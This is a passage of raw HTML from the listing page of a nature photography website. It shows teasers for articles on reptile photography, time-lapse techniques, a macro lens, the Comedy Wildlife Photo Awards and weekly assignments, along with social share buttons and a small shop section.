data-essb-twitter-url="https://www.naturettl.com/adobe-warns-of-lawsuits-for-using-older-cc-apps/" data-essb-instance="1230262843"><ul class="essb_links_list essb_force_hide_name essb_force_hide"><li class="essb_item essb_link_facebook nolightbox"> <a href="https://www.facebook.com/dialog/feed?app_id=904125896346646&amp;display=popup&amp;name=Adobe Warns of Lawsuits for Using Older CC Apps&amp;link=https://www.naturettl.com/adobe-warns-of-lawsuits-for-using-older-cc-apps/&picture=https://www.naturettl.com/wp-content/uploads/2019/05/adobe-sue-1.jpg&description=Adobe has warned some of its customers of potential legal action from third-parties if they continue to use older versions of their CC apps." title="" onclick="essb.window(&#39;https://www.facebook.com/dialog/feed?app_id=904125896346646&amp;display=popup&amp;name=Adobe Warns of Lawsuits for Using Older CC Apps&amp;link=https://www.naturettl.com/adobe-warns-of-lawsuits-for-using-older-cc-apps/&picture=https://www.naturettl.com/wp-content/uploads/2019/05/adobe-sue-1.jpg&description=Adobe has warned some of its customers of potential legal action from third-parties if they continue to use older versions of their CC apps.&#39;,&#39;facebook_advanced&#39;,&#39;1230262843&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_facebook"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href="#" title="" onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=Adobe Warns of Lawsuits for Using Older CC Apps&amp;url=https://www.naturettl.com/adobe-warns-of-lawsuits-for-using-older-cc-apps/&amp;counturl=https://www.naturettl.com/adobe-warns-of-lawsuits-for-using-older-cc-apps/&amp;related=NatureTTL&amp;via=NatureTTL&#39;,&#39;twitter&#39;,&#39;1230262843&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_twitter"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=https://www.naturettl.com/adobe-warns-of-lawsuits-for-using-older-cc-apps/" title="" onclick="essb.window(&#39;https://plus.google.com/share?url=https://www.naturettl.com/adobe-warns-of-lawsuits-for-using-older-cc-apps/&#39;,&#39;google&#39;,&#39;1230262843&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_google"></span><span class="essb_network_name essb_noname"></span></a></li></ul></div> </div> <button class="_button post-social-button"> <img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_share.png" alt="Share this post" width="15" id="foobar"> </button> </div> </div> </article><article class="post post--listing"> <div class="row"> <div class="col-sm-5 col-xs-12"> <a href="https://www.naturettl.com/weekly-photography-assignment-the-night-sky/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2019/05/night-sky-800x600.jpg" width="800" height="600" class="img-responsive wp-post-image" alt srcset="https://www.naturettl.com/wp-content/uploads/2019/05/night-sky-800x600.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/05/night-sky-400x300.jpg 400w" sizes="(max-width: 800px) 100vw, 800px" data-wp-pid="14748" nopin="nopin"><noscript><img width="800" height="600" src="https://www.naturettl.com/wp-content/uploads/2019/05/night-sky-800x600.jpg" class="img-responsive wp-post-image" alt="" srcset="https://www.naturettl.com/wp-content/uploads/2019/05/night-sky-800x600.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/05/night-sky-400x300.jpg 400w" sizes="(max-width: 800px) 100vw, 800px" data-wp-pid="14748" nopin="nopin" /></noscript> </a> </div> <div class="col-sm-6 col-xs-12"> <div class="post__mobile-wrap"> <ul class="post__categories list-inline"> <li><a href="/category/uncategorised">Uncategorised</a></li> </ul> <h2 class="post__title"><a href='https://www.naturettl.com/weekly-photography-assignment-the-night-sky/'>Weekly Photography Assignment: The Night Sky</a></h2> <div class="post__description"> <p>Each week we’ll be giving you a theme that you can submit a photo for, and we’ll choose&nbsp;our...</p> </div> <footer class="post__footer"> <div class="row"> <div class="col-xs-12 col-sm-10"> <ul class="post__byline list-inline"> <li><i class="fa fa-flag"></i> <a href="https://www.naturettl.com/author/nature-ttl/">Nature TTL</a></li> <li><i class="fa fa-comment green"></i> <a href="https://www.naturettl.com/weekly-photography-assignment-the-night-sky/#disqus_thread" class="_comments disqus-comment-count">Comment</a></li> </ul> </div> </div> </footer> </div> </div> <div class="post__social hidden-xs" id="post-social-14746"> <div class="_icons post-social-icons"> <div class="essb_links essb_counter_modern_right essb_displayed_shortcode essb_share essb_template_dark-retina essb_955896767 print-no" id="essb_displayed_shortcode_955896767" data-essb-postid="14746" data-essb-position="shortcode" data-essb-button-style="icon" data-essb-template="dark-retina" data-essb-counter-pos="right" data-essb-url="https://www.naturettl.com/weekly-photography-assignment-the-night-sky/" data-essb-twitter-url="https://www.naturettl.com/weekly-photography-assignment-the-night-sky/" data-essb-instance="955896767"><ul class="essb_links_list essb_force_hide_name essb_force_hide"><li class="essb_item essb_link_facebook nolightbox"> <a href="https://www.facebook.com/dialog/feed?app_id=904125896346646&amp;display=popup&amp;name=Weekly Photography Assignment: The Night Sky&amp;link=https://www.naturettl.com/weekly-photography-assignment-the-night-sky/&picture=https://www.naturettl.com/wp-content/uploads/2019/05/night-sky.jpg" title="" onclick="essb.window(&#39;https://www.facebook.com/dialog/feed?app_id=904125896346646&amp;display=popup&amp;name=Weekly Photography Assignment: The Night Sky&amp;link=https://www.naturettl.com/weekly-photography-assignment-the-night-sky/&picture=https://www.naturettl.com/wp-content/uploads/2019/05/night-sky.jpg&#39;,&#39;facebook_advanced&#39;,&#39;955896767&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_facebook"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href="#" title="" onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=Weekly Photography Assignment: The Night Sky&amp;url=https://www.naturettl.com/weekly-photography-assignment-the-night-sky/&amp;counturl=https://www.naturettl.com/weekly-photography-assignment-the-night-sky/&amp;related=NatureTTL&amp;via=NatureTTL&#39;,&#39;twitter&#39;,&#39;955896767&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_twitter"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=https://www.naturettl.com/weekly-photography-assignment-the-night-sky/" title="" onclick="essb.window(&#39;https://plus.google.com/share?url=https://www.naturettl.com/weekly-photography-assignment-the-night-sky/&#39;,&#39;google&#39;,&#39;955896767&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_google"></span><span class="essb_network_name essb_noname"></span></a></li></ul></div> </div> <button class="_button post-social-button"> <img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_share.png" alt="Share this post" width="15" id="foobar"> </button> </div> </div> </article><article class="post post--archive-featured"> <a href="https://www.naturettl.com/photograph-reptiles-uk/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-900x600.jpg" width="900" height="600" class="img-responsive wp-post-image" alt srcset="https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-900x600.jpg 900w, https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-300x200.jpg 300w, https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-768x512.jpg 768w, https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-1024x683.jpg 1024w, https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-800x534.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-550x367.jpg 550w, https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4.jpg 1600w" sizes="(max-width: 900px) 100vw, 900px" data-wp-pid="14428" nopin="nopin"><noscript><img width="900" height="600" src="https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-900x600.jpg" class="img-responsive wp-post-image" alt="" srcset="https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-900x600.jpg 900w, https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-300x200.jpg 300w, https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-768x512.jpg 768w, https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-1024x683.jpg 1024w, https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-800x534.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-550x367.jpg 550w, https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4.jpg 1600w" sizes="(max-width: 900px) 100vw, 900px" data-wp-pid="14428" nopin="nopin" /></noscript> </a> <div class="row"> <div class="col-sm-3 hidden-xs"> <ul class="post__categories list-inline"> <li><a href="https://www.naturettl.com/photography-tutorials/wildlife-tutorials/">Wildlife</a></li> </ul> <span class="post__date"><i class="fa fa-clock-o green"></i> May 14th, 2019</span> <a href="https://www.naturettl.com/photograph-reptiles-uk/#disqus_thread" class="post__comments disqus-comment-count">Comment</a> </div> <div class="col-sm-9"> <div class="_content"> <div class="row"> <div class="col-md-10"> <h1 class="post__title"><a href="https://www.naturettl.com/photograph-reptiles-uk/">How to Photograph Reptiles in the UK</a></h1> <div class="post__description"> <p>There is class of wildlife that has even the most dedicated of animal lovers divided: reptiles. But love them or hate them, these pre-historic-looking creatures can make for some great...</p> </div> <div class="visible-xs"> <ul class="post__categories list-inline"> <li><a href="https://www.naturettl.com/photography-tutorials/wildlife-tutorials/">Wildlife</a></li> </ul> <span class="post__date"><i class="fa fa-clock-o green"></i> May 14th, 2019</span> <a href="https://www.naturettl.com/photograph-reptiles-uk/#disqus_thread" class="post__comments disqus-comment-count">Comment</a> </div> </div> </div> </div> </div> </div> </article><article class="post post--listing"> <div class="row"> <div class="col-sm-5 col-xs-12"> <a href="https://www.naturettl.com/how-to-covert-time-lapses-into-long-exposure-photos/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2019/05/time-lapse-long-exposure-1-800x600.jpg" width="800" height="600" class="img-responsive wp-post-image" alt srcset="https://www.naturettl.com/wp-content/uploads/2019/05/time-lapse-long-exposure-1-800x600.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/05/time-lapse-long-exposure-1-400x300.jpg 400w" sizes="(max-width: 800px) 100vw, 800px" data-wp-pid="14720" nopin="nopin"><noscript><img width="800" height="600" src="https://www.naturettl.com/wp-content/uploads/2019/05/time-lapse-long-exposure-1-800x600.jpg" class="img-responsive wp-post-image" alt="" srcset="https://www.naturettl.com/wp-content/uploads/2019/05/time-lapse-long-exposure-1-800x600.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/05/time-lapse-long-exposure-1-400x300.jpg 400w" sizes="(max-width: 800px) 100vw, 800px" data-wp-pid="14720" nopin="nopin" /></noscript> </a> </div> <div class="col-sm-6 col-xs-12"> <div class="post__mobile-wrap"> <ul class="post__categories list-inline"> <li><a href="/category/videos">Videos</a></li> </ul> <h2 class="post__title"><a href='https://www.naturettl.com/how-to-covert-time-lapses-into-long-exposure-photos/'>How to Covert Time-lapses into Long Exposure Photos</a></h2> <div class="post__description"> <p>Whether it's a reckless ocean transformed to a smooth blanket of blue, or rolling clouds turned into beautiful...</p> </div> <footer class="post__footer"> <div class="row"> <div class="col-xs-12 col-sm-10"> <ul class="post__byline list-inline"> <li><i class="fa fa-flag"></i> <a href="https://www.naturettl.com/author/ed-carr/">Ed Carr</a></li> <li><i class="fa fa-comment green"></i> <a href="https://www.naturettl.com/how-to-covert-time-lapses-into-long-exposure-photos/#disqus_thread" class="_comments disqus-comment-count">Comment</a></li> </ul> </div> </div> </footer> </div> </div> <div class="post__social hidden-xs" id="post-social-14718"> <div class="_icons post-social-icons"> <div class="essb_links essb_counter_modern_right essb_displayed_shortcode essb_share essb_template_dark-retina essb_83189615 print-no" id="essb_displayed_shortcode_83189615" data-essb-postid="14718" data-essb-position="shortcode" data-essb-button-style="icon" data-essb-template="dark-retina" data-essb-counter-pos="right" data-essb-url="https://www.naturettl.com/how-to-covert-time-lapses-into-long-exposure-photos/" data-essb-twitter-url="https://www.naturettl.com/how-to-covert-time-lapses-into-long-exposure-photos/" data-essb-instance="83189615"><ul class="essb_links_list essb_force_hide_name essb_force_hide"><li class="essb_item essb_link_facebook nolightbox"> <a href="https://www.facebook.com/dialog/feed?app_id=904125896346646&amp;display=popup&amp;name=How to Covert Time-lapses into Long Exposure Photos&amp;link=https://www.naturettl.com/how-to-covert-time-lapses-into-long-exposure-photos/&picture=https://www.naturettl.com/wp-content/uploads/2019/05/time-lapse-long-exposure-1.jpg&description=Photographer Joshua Cripps shows you how to transform time-lapses into beautiful long exposures using a simple Photoshop technique, in this short video." title="" onclick="essb.window(&#39;https://www.facebook.com/dialog/feed?app_id=904125896346646&amp;display=popup&amp;name=How to Covert Time-lapses into Long Exposure Photos&amp;link=https://www.naturettl.com/how-to-covert-time-lapses-into-long-exposure-photos/&picture=https://www.naturettl.com/wp-content/uploads/2019/05/time-lapse-long-exposure-1.jpg&description=Photographer Joshua Cripps shows you how to transform time-lapses into beautiful long exposures using a simple Photoshop technique, in this short video.&#39;,&#39;facebook_advanced&#39;,&#39;83189615&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_facebook"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href="#" title="" onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=How to Covert Time-lapses into Long Exposure Photos&amp;url=https://www.naturettl.com/how-to-covert-time-lapses-into-long-exposure-photos/&amp;counturl=https://www.naturettl.com/how-to-covert-time-lapses-into-long-exposure-photos/&amp;related=NatureTTL&amp;via=NatureTTL&#39;,&#39;twitter&#39;,&#39;83189615&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_twitter"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=https://www.naturettl.com/how-to-covert-time-lapses-into-long-exposure-photos/" title="" onclick="essb.window(&#39;https://plus.google.com/share?url=https://www.naturettl.com/how-to-covert-time-lapses-into-long-exposure-photos/&#39;,&#39;google&#39;,&#39;83189615&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_google"></span><span class="essb_network_name essb_noname"></span></a></li></ul></div> </div> <button class="_button post-social-button"> <img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_share.png" alt="Share this post" width="15" id="foobar"> </button> </div> </div> </article> <article class="post post--listing"> <div class="row"> <div class="col-sm-5 col-xs-12"> <a href="https://www.naturettl.com/laowa-100mm-f-2-8-ultra-macro-offers-extreme-21-ratio/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2019/05/laowa-100mm-9-800x600.jpg" width="800" height="600" class="img-responsive wp-post-image" alt srcset="https://www.naturettl.com/wp-content/uploads/2019/05/laowa-100mm-9-800x600.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/05/laowa-100mm-9-400x300.jpg 400w" sizes="(max-width: 800px) 100vw, 800px" data-wp-pid="14730" nopin="nopin"><noscript><img width="800" height="600" src="https://www.naturettl.com/wp-content/uploads/2019/05/laowa-100mm-9-800x600.jpg" class="img-responsive wp-post-image" alt="" srcset="https://www.naturettl.com/wp-content/uploads/2019/05/laowa-100mm-9-800x600.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/05/laowa-100mm-9-400x300.jpg 400w" sizes="(max-width: 800px) 100vw, 800px" data-wp-pid="14730" nopin="nopin" /></noscript> </a> </div> <div class="col-sm-6 col-xs-12"> <div class="post__mobile-wrap"> <ul class="post__categories list-inline"> <li><a href="/category/equipment">Equipment</a></li> <li><a href="/category/equipment-news">News</a></li> </ul> <h2 class="post__title"><a href='https://www.naturettl.com/laowa-100mm-f-2-8-ultra-macro-offers-extreme-21-ratio/'>Laowa 100mm F/2.8 &#8216;Ultra Macro&#8217; Offers Extreme 2:1 Ratio</a></h2> <div class="post__description"> <p>Following an initial announcement last month, independent lens manufacturer Venus Optics has officially released details of its new&nbsp;Laowa...</p> </div> <footer class="post__footer"> <div class="row"> <div class="col-xs-12 col-sm-10"> <ul class="post__byline list-inline"> <li><i class="fa fa-flag"></i> <a href="https://www.naturettl.com/author/ed-carr/">Ed Carr</a></li> <li><i class="fa fa-comment green"></i> <a href="https://www.naturettl.com/laowa-100mm-f-2-8-ultra-macro-offers-extreme-21-ratio/#disqus_thread" class="_comments disqus-comment-count">Comment</a></li> </ul> </div> </div> </footer> </div> </div> <div class="post__social hidden-xs" id="post-social-14723"> <div class="_icons post-social-icons"> <div class="essb_links essb_counter_modern_right essb_displayed_shortcode essb_share essb_template_dark-retina essb_1682460848 print-no" id="essb_displayed_shortcode_1682460848" data-essb-postid="14723" data-essb-position="shortcode" data-essb-button-style="icon" data-essb-template="dark-retina" data-essb-counter-pos="right" data-essb-url="https://www.naturettl.com/laowa-100mm-f-2-8-ultra-macro-offers-extreme-21-ratio/" data-essb-twitter-url="https://www.naturettl.com/laowa-100mm-f-2-8-ultra-macro-offers-extreme-21-ratio/" data-essb-instance="1682460848"><ul class="essb_links_list essb_force_hide_name essb_force_hide"><li class="essb_item essb_link_facebook nolightbox"> <a href="https://www.facebook.com/dialog/feed?app_id=904125896346646&amp;display=popup&amp;name=Laowa 100mm F/2.8 &%238216;Ultra Macro&%238217; Offers Extreme 2:1 Ratio&amp;link=https://www.naturettl.com/laowa-100mm-f-2-8-ultra-macro-offers-extreme-21-ratio/&picture=https://www.naturettl.com/wp-content/uploads/2019/05/laowa-100mm-9.jpg&description=Venus Optics\&%23039; latest Laowa 100mm f/2.8 Ultra Macro lens offers a 2:1 magnification ratio - double of any mainstream competitors." title="" onclick="essb.window(&#39;https://www.facebook.com/dialog/feed?app_id=904125896346646&amp;display=popup&amp;name=Laowa 100mm F/2.8 &%238216;Ultra Macro&%238217; Offers Extreme 2:1 Ratio&amp;link=https://www.naturettl.com/laowa-100mm-f-2-8-ultra-macro-offers-extreme-21-ratio/&picture=https://www.naturettl.com/wp-content/uploads/2019/05/laowa-100mm-9.jpg&description=Venus Optics\&%23039; latest Laowa 100mm f/2.8 Ultra Macro lens offers a 2:1 magnification ratio - double of any mainstream competitors.&#39;,&#39;facebook_advanced&#39;,&#39;1682460848&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_facebook"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href="#" title="" onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=Laowa 100mm F/2.8 %26%238216;Ultra Macro%26%238217; Offers Extreme 2:1 Ratio&amp;url=https://www.naturettl.com/laowa-100mm-f-2-8-ultra-macro-offers-extreme-21-ratio/&amp;counturl=https://www.naturettl.com/laowa-100mm-f-2-8-ultra-macro-offers-extreme-21-ratio/&amp;related=NatureTTL&amp;via=NatureTTL&#39;,&#39;twitter&#39;,&#39;1682460848&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_twitter"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=https://www.naturettl.com/laowa-100mm-f-2-8-ultra-macro-offers-extreme-21-ratio/" title="" onclick="essb.window(&#39;https://plus.google.com/share?url=https://www.naturettl.com/laowa-100mm-f-2-8-ultra-macro-offers-extreme-21-ratio/&#39;,&#39;google&#39;,&#39;1682460848&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_google"></span><span class="essb_network_name essb_noname"></span></a></li></ul></div> </div> <button class="_button post-social-button"> <img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_share.png" alt="Share this post" width="15" id="foobar"> </button> </div> </div> </article><article class="post post--listing"> <div class="row"> <div class="col-sm-5 col-xs-12"> <a href="https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2019/05/comedy-2019-5-800x600.jpg" width="800" height="600" class="img-responsive wp-post-image" alt srcset="https://www.naturettl.com/wp-content/uploads/2019/05/comedy-2019-5-800x600.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/05/comedy-2019-5-400x300.jpg 400w" sizes="(max-width: 800px) 100vw, 800px" data-wp-pid="14705" nopin="nopin"><noscript><img width="800" height="600" src="https://www.naturettl.com/wp-content/uploads/2019/05/comedy-2019-5-800x600.jpg" class="img-responsive wp-post-image" alt="" srcset="https://www.naturettl.com/wp-content/uploads/2019/05/comedy-2019-5-800x600.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/05/comedy-2019-5-400x300.jpg 400w" sizes="(max-width: 800px) 100vw, 800px" data-wp-pid="14705" nopin="nopin" /></noscript> </a> </div> <div class="col-sm-6 col-xs-12"> <div class="post__mobile-wrap"> <ul class="post__categories list-inline"> <li><a href="/category/inspiration">Inspiration</a></li> <li><a href="/category/wildlife-inspiration">Wildlife</a></li> </ul> <h2 class="post__title"><a href='https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/'>Comedy Wildlife Photo Awards 2019 &#8211; Best Entries So Far!</a></h2> <div class="post__description"> <p>Each year The Comedy Wildlife Photography Awards gives us the chance to howl and hoot at nature's most...</p> </div> <footer class="post__footer"> <div class="row"> <div class="col-xs-12 col-sm-10"> <ul class="post__byline list-inline"> <li><i class="fa fa-flag"></i> <a href="https://www.naturettl.com/author/ed-carr/">Ed Carr</a></li> <li><i class="fa fa-comment green"></i> <a href="https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/#disqus_thread" class="_comments disqus-comment-count">Comment</a></li> </ul> </div> </div> </footer> </div> </div> <div class="post__social hidden-xs" id="post-social-14704"> <div class="_icons post-social-icons"> <div class="essb_links essb_counter_modern_right essb_displayed_shortcode essb_share essb_template_dark-retina essb_1572872100 print-no" id="essb_displayed_shortcode_1572872100" data-essb-postid="14704" data-essb-position="shortcode" data-essb-button-style="icon" data-essb-template="dark-retina" data-essb-counter-pos="right" data-essb-url="https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/" data-essb-twitter-url="https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/" data-essb-instance="1572872100"><ul class="essb_links_list essb_force_hide_name essb_force_hide"><li class="essb_item essb_link_facebook nolightbox"> <a href="https://www.facebook.com/dialog/feed?app_id=904125896346646&amp;display=popup&amp;name=Comedy Wildlife Photo Awards 2019 &%238211; Best Entries So Far!&amp;link=https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/&picture=https://www.naturettl.com/wp-content/uploads/2019/05/comedy-2019-5.jpg&description=The Comedy Wildlife Photo Awards 2019 is back with this year\&%23039;s best entries so far, showing us nature at its most hilarious!" title="" onclick="essb.window(&#39;https://www.facebook.com/dialog/feed?app_id=904125896346646&amp;display=popup&amp;name=Comedy Wildlife Photo Awards 2019 &%238211; Best Entries So Far!&amp;link=https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/&picture=https://www.naturettl.com/wp-content/uploads/2019/05/comedy-2019-5.jpg&description=The Comedy Wildlife Photo Awards 2019 is back with this year\&%23039;s best entries so far, showing us nature at its most hilarious!&#39;,&#39;facebook_advanced&#39;,&#39;1572872100&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_facebook"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href="#" title="" onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=Comedy Wildlife Photo Awards 2019 %26%238211; Best Entries So Far!&amp;url=https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/&amp;counturl=https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/&amp;related=NatureTTL&amp;via=NatureTTL&#39;,&#39;twitter&#39;,&#39;1572872100&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_twitter"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/" title="" onclick="essb.window(&#39;https://plus.google.com/share?url=https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/&#39;,&#39;google&#39;,&#39;1572872100&#39;); return false;" target="_blank" rel="nofollow" class="nolightbox"><span class="essb_icon essb_icon_google"></span><span class="essb_network_name essb_noname"></span></a></li></ul></div> </div> <button class="_button post-social-button"> <img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_share.png" alt="Share this post" width="15" id="foobar"> </button> </div> </div> </article> <div class="post-collection post-collection--shop"> <div class="swiper-container"> <div class="row"> <div class="col-sm-6 col-xs-8"> <h2 class="post-collection__title">Shop</h2> </div> <div class="col-sm-6 col-xs-4"> <a href="/shop" class="post-collection__view-all">View All</a> </div> </div> <div class="swiper-wrapper"> <div class="swiper-slide"> <article class="post post--shop"> <div class="post__image"> <a href="https://www.naturettl.com/product/the-photographers-guide-to-social-media-marketing/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2019/02/socialmedia-book.jpg" width="600" height="500" class="img-responsive wp-post-image" alt srcset="https://www.naturettl.com/wp-content/uploads/2019/02/socialmedia-book.jpg 600w, https://www.naturettl.com/wp-content/uploads/2019/02/socialmedia-book-300x250.jpg 300w, https://www.naturettl.com/wp-content/uploads/2019/02/socialmedia-book-550x458.jpg 550w" sizes="(max-width: 600px) 100vw, 600px" data-wp-pid="13795" nopin="nopin"><noscript><img width="600" height="500" src="https://www.naturettl.com/wp-content/uploads/2019/02/socialmedia-book.jpg" class="img-responsive wp-post-image" alt="" srcset="https://www.naturettl.com/wp-content/uploads/2019/02/socialmedia-book.jpg 600w, https://www.naturettl.com/wp-content/uploads/2019/02/socialmedia-book-300x250.jpg 300w, https://www.naturettl.com/wp-content/uploads/2019/02/socialmedia-book-550x458.jpg 550w" sizes="(max-width: 600px) 100vw, 600px" data-wp-pid="13795" nopin="nopin" /></noscript> </a> <span class="post__price">&pound;8.99</span> </div> <h2 class="post__title"><a href="https://www.naturettl.com/product/the-photographers-guide-to-social-media-marketing/">The Photographer&#8217;s Guide to Social Media Marketing</a></h2> </article> </div> <div class="swiper-slide"> <article class="post post--shop"> <div class="post__image"> <a href="https://www.naturettl.com/product/camouflage-lens-covers/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2017/02/lens-camo-600x500.jpg" width="600" height="500" class="img-responsive wp-post-image" alt data-wp-pid="7523" nopin="nopin"><noscript><img width="600" height="500" src="https://www.naturettl.com/wp-content/uploads/2017/02/lens-camo-600x500.jpg" class="img-responsive wp-post-image" alt="" data-wp-pid="7523" nopin="nopin" /></noscript> </a> <span class="post__price">&pound;28+</span> </div> <h2 class="post__title"><a href="https://www.naturettl.com/product/camouflage-lens-covers/">Camouflage Lens Covers</a></h2> </article> </div> <div class="swiper-slide"> <article class="post post--shop"> <div class="post__image"> <a href="https://www.naturettl.com/product/breaking-into-business/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2016/12/shop-cover-600x500.jpg" width="600" height="500" class="img-responsive wp-post-image" alt data-wp-pid="7411" nopin="nopin"><noscript><img width="600" height="500" src="https://www.naturettl.com/wp-content/uploads/2016/12/shop-cover-600x500.jpg" class="img-responsive wp-post-image" alt="" data-wp-pid="7411" nopin="nopin" /></noscript> </a> <span class="post__price">&pound;14.99</span> </div> <h2 class="post__title"><a href="https://www.naturettl.com/product/breaking-into-business/">Breaking Into Business</a></h2> </article> </div> </div> </div> </div> <article class="post post--listing"> <div class="row"> <div class="col-sm-5 col-xs-12"> <a href="https://www.naturettl.com/weekly-photography-assignment-framing/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2019/05/framing-800x600.jpg" width="800" height="600" class="img-responsive wp-post-image" alt srcset="https://www.naturettl.com/wp-content/uploads/2019/05/framing-800x600.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/05/framing-400x300.jpg 400w" sizes="(max-width: 800px) 100vw, 800px" data-wp-pid="14700" nopin="nopin"><noscript><img width="800" height="600" src="https://www.naturettl.com/wp-content/uploads/2019/05/framing-800x600.jpg" class="img-responsive wp-post-image" alt="" srcset="https://www.naturettl.com/wp-content/uploads/2019/05/framing-800x600.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/05/framing-400x300.jpg 400w" sizes="(max-width: 800px) 100vw, 800px" data-wp-pid="14700" nopin="nopin" /></noscript> </a> </div> <div class="col-sm-6 col-xs-12"> <div class="post__mobile-wrap"> <ul class="post__categories list-inline"> <li><a href="/category/assignments">Assignments</a></li> </ul> <h2 class="post__title"><a 